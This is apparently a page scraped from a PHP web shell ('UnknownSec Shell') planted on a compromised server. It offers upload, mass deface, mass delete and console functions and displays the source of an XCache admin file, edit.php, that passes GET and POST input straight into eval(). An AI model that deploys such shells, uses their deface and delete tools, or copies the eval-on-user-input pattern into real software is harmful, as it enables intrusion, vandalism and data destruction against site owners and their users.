shell bypass 403
UnknownSec Shell
:
/
proc
/
self
/
root
/
proc
/
self
/
root
/
opt
/
alt
/
php56
/
usr
/
share
/
xcache_3
/
cacher
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
edit.php
<?php include "./common.php"; if (!isset($_GET['name'])) { die("missing name"); } // trigger auth $vcnt = xcache_count(XC_TYPE_VAR); xcache_admin_namespace(); $name = $_GET['name']; if (!empty($config['enable_eval'])) { eval('$name = ' . $name . ';'); } if ($_SERVER['REQUEST_METHOD'] == 'POST') { if (!empty($config['enable_eval'])) { eval('$value = ' . $_POST['value'] . ';'); } else { $value = $_POST['value']; } xcache_set($name, $value); header("Location: ./?do=listvar"); exit; } $value = xcache_get($name); if (!empty($config['enable_eval'])) { $value = var_export($value, true); $editable = true; } else { if (is_string($value)) { $editable = true; } else { $editable = false; $value = var_export($value, true); } } include "edit.tpl.php"; ?>
© 2024 UnknownSec